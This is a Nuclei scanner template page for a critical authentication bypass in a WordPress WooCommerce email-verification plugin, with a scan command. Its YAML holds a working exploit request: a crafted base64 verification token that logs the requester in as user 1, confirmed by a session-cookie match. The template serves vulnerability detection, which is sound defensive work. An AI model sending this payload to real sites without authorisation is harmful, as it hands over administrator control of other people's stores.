Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
ID: wp-woocommerce-email-verification
Severity: critical
Author: random_robbie,daffianfo
Tags: woocommerce,wp,wpscan,wordpress,wp-plugin
Description
Section titled “Description”Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
YAML Source
Section titled “YAML Source”id: wp-woocommerce-email-verification
info: name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass author: random_robbie,daffianfo severity: critical description: | Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator. reference: - https://wpvulndb.com/vulnerabilities/10318 - https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-288 metadata: max-request: 2 tags: woocommerce,wp,wpscan,wordpress,wp-plugin
http: - method: GET path: - "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
stop-at-first-match: true
matchers-condition: and matchers: - type: regex part: header regex: - "wordpress_logged_in_[a-z0-9]{32}"
- type: word part: body words: - "Your account has been activated!" - "From your account dashboard you can view your" condition: and
- type: status status: - 200# digest: 4b0a00483046022100aecf872414bff1e3fbbad4fa1f9e47774697d047a0ea76d8536a4c32fc6135bd022100888ae1ed5c383930164745cecfe45f9444b4578e459265cfb8965f50d1d95a5d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml"